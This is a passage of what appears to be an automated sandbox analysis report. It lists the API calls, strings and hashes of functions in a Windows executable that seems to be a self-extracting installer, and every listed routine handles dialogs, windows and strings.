Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
String ID: IMAGES$STATIC
API String ID: 4202116410-1168396491
Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68

Function 0040813D Relevance: 27.1, APIs: 18, Instructions: 147windowcomtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950

GetDlgItem.USER32(?,000004B8), ref: 0040816A
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
GetDlgItem.USER32(?,000004B5), ref: 004081C0
GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
GetDlgItem.USER32(?,000004B5), ref: 004081D5
SetWindowLongW.USER32(00000000), ref: 004081D8
GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
GetDlgItem.USER32(?,000004B4), ref: 0040821A
SetFocus.USER32(00000000), ref: 0040821D
SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
GetDlgItem.USER32(?,00000002), ref: 00408294
IsWindow.USER32(00000000), ref: 00408297
GetDlgItem.USER32(?,00000002), ref: 004082A7
EnableWindow.USER32(00000000), ref: 004082AA
GetDlgItem.USER32(?,000004B5), ref: 004082BE
ShowWindow.USER32(00000000), ref: 004082C1

Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142

Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53

Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID:
API String ID: 855516470-0
Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C

Function 00403093 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 244stringCOMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
strncmp.MSVCRT ref: 004031F1
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347

Strings

SetEnvironment, xrefs: 0040326B
MiscFlags, xrefs: 004032C0
hAA, xrefs: 0040309E
{\rtf, xrefs: 004031D6, 004031EB
GUIFlags, xrefs: 004032B2

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@$lstrcmpstrncmp
String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
API String ID: 2881732429-172299233
Opcode ID: 471e04daab831b53a00006510db52a631ba4417ec6ca7480a599de0d51fc2d77
Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
Opcode Fuzzy Hash: 471e04daab831b53a00006510db52a631ba4417ec6ca7480a599de0d51fc2d77
Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59

Function 00406A47 Relevance: 24.3, APIs: 16, Instructions: 270COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 00406A69
GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
GetDlgItem.USER32(?,000004B4), ref: 00406AA5
GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
GetSystemMetrics.USER32(00000010), ref: 00406B0B
GetSystemMetrics.USER32(00000011), ref: 00406B11
GetSystemMetrics.USER32(00000008), ref: 00406B18
GetSystemMetrics.USER32(00000007), ref: 00406B1F
GetParent.USER32(?), ref: 00406B43
GetClientRect.USER32(00000000,?), ref: 00406B55
ClientToScreen.USER32(?,?), ref: 00406B68
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
GetClientRect.USER32(?,?), ref: 00406C55
ClientToScreen.USER32(?,?), ref: 00406B71

Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B

GetSystemMetrics.USER32(00000008), ref: 00406CD6
GetSystemMetrics.USER32(00000007), ref: 00406CDD

Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
String ID:
API String ID: 747815384-0
Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64

Function 00407D06 Relevance: 22.7, APIs: 15, Instructions: 231windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
LoadIconW.USER32(00000000), ref: 00407D33
GetSystemMetrics.USER32(00000032), ref: 00407D43
GetSystemMetrics.USER32(00000031), ref: 00407D48
GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
LoadImageW.USER32(00000000), ref: 00407D54
SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
GetWindow.USER32(?,00000005), ref: 00407E76
GetWindow.USER32(?,00000005), ref: 00407E92
GetWindow.USER32(?,00000005), ref: 00407EAA
GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
LoadIconW.USER32(00000000), ref: 00407F0D
GetDlgItem.USER32(?,000004B1), ref: 00407F28
SendMessageW.USER32(00000000), ref: 00407F2F

Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B

Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
String ID:
API String ID: 1889686859-0
Opcode ID: db9dc12c40266ba28352090c91f8535442cf433b61bc57d004062dfa9524bb35
Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
Opcode Fuzzy Hash: db9dc12c40266ba28352090c91f8535442cf433b61bc57d004062dfa9524bb35
Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF

Function 00406F37 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00406F45
GetWindowLongW.USER32(00000000), ref: 00406F4C
DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
GetSystemMetrics.USER32(00000031), ref: 00406F91
GetSystemMetrics.USER32(00000032), ref: 00406F98
GetWindowDC.USER32(?), ref: 00406FAA
GetWindowRect.USER32(?,?), ref: 00406FB7
DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
ReleaseDC.USER32(?,00000000), ref: 00406FF3

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
String ID:
API String ID: 2586545124-0
Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64

Function 0040677A Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 0040678E
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
GetDlgItem.USER32(?,000004B4), ref: 004067AB
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
GetDlgItem.USER32(?,?), ref: 004067CC
SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
GetDlgItem.USER32(?,?), ref: 004067DD
SetFocus.USER32(00000000,?,000004B4,75570E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ItemMessageSend$Focus
String ID:
API String ID: 3946207451-0
Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28

Function 0040C3D8 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 480COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603

Strings

IA, xrefs: 0040C66E
IA, xrefs: 0040C74D
IA, xrefs: 0040C65E
IA, xrefs: 0040C4D9
IA, xrefs: 0040C4C6
IA, xrefs: 0040C4AF

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@
String ID: IA$IA$IA$IA$IA$IA
API String ID: 613200358-3743982587
Opcode ID: 40f272bda1e8b06883172bb117e612dab295516409bd6b20c4bfa41197a0bb68
Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
Opcode Fuzzy Hash: 40f272bda1e8b06883172bb117e612dab295516409bd6b20c4bfa41197a0bb68
Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58

Function 004083B6 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 196COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479

Strings

FinishMessage, xrefs: 00408417, 00408433
SetEnvironment, xrefs: 004083BC
WarningTitle, xrefs: 0040853A
HelpText, xrefs: 00408598
BeginPrompt, xrefs: 004084A4, 004084A9
ErrorTitle, xrefs: 00408511

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@
String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
API String ID: 613200358-994561823
Opcode ID: ba6429a52b0e3d4e37370c566184cf06056e8edfb56e018e3387c8b386e99002
Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
Opcode Fuzzy Hash: ba6429a52b0e3d4e37370c566184cf06056e8edfb56e018e3387c8b386e99002
Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E

Function 00406DB2 Relevance: 12.1, APIs: 8, Instructions: 69COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
GetDC.USER32(00000000), ref: 00406DFB
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
ReleaseDC.USER32(00000000,?), ref: 00406E24
GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
String ID:
API String ID: 2693764856-0
Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65

Function 0040695E Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 0040696E
GetSystemMetrics.USER32(0000000B), ref: 0040698A
GetSystemMetrics.USER32(0000003D), ref: 00406993
GetSystemMetrics.USER32(0000003E), ref: 0040699B
SelectObject.GDI32(?,?), ref: 004069B8
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
SelectObject.GDI32(?,?), ref: 004069F9
ReleaseDC.USER32(?,?), ref: 00406A08

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40

Function 00407B33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
GetDlgItem.USER32(?,000004B8), ref: 00407B8B
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
wsprintfW.USER32 ref: 00407BBB
??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53

Strings

%d%%, xrefs: 00407BB5

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID: %d%%
API String ID: 3753976982-1518462796
Opcode ID: aa4dec2a7ad722700f06cff0ab8aedf9afd1fc0073b92253c29a7aba1139f781
Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
Opcode Fuzzy Hash: aa4dec2a7ad722700f06cff0ab8aedf9afd1fc0073b92253c29a7aba1139f781
Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59

Function 0040408B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4

Part of subcall function 00401A85: CharUpperW.USER32(?,7556E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175

Strings

hAA, xrefs: 00404091, 0040409B, 004040A2, 004040B0

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@$CharUpper$lstrlen
String ID: hAA
API String ID: 2587799592-1362906312
Opcode ID: adb6fa16ce232373d688ba306e393be0ac1d0d6b70f8692f98c2ac8800094ba3
Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
Opcode Fuzzy Hash: adb6fa16ce232373d688ba306e393be0ac1d0d6b70f8692f98c2ac8800094ba3
Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658

Function 00404CBC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8

Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D

Strings

;!@InstallEnd@!, xrefs: 00404D73
;!@Install@!UTF-8!, xrefs: 00404D59
03A, xrefs: 00404CCF

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
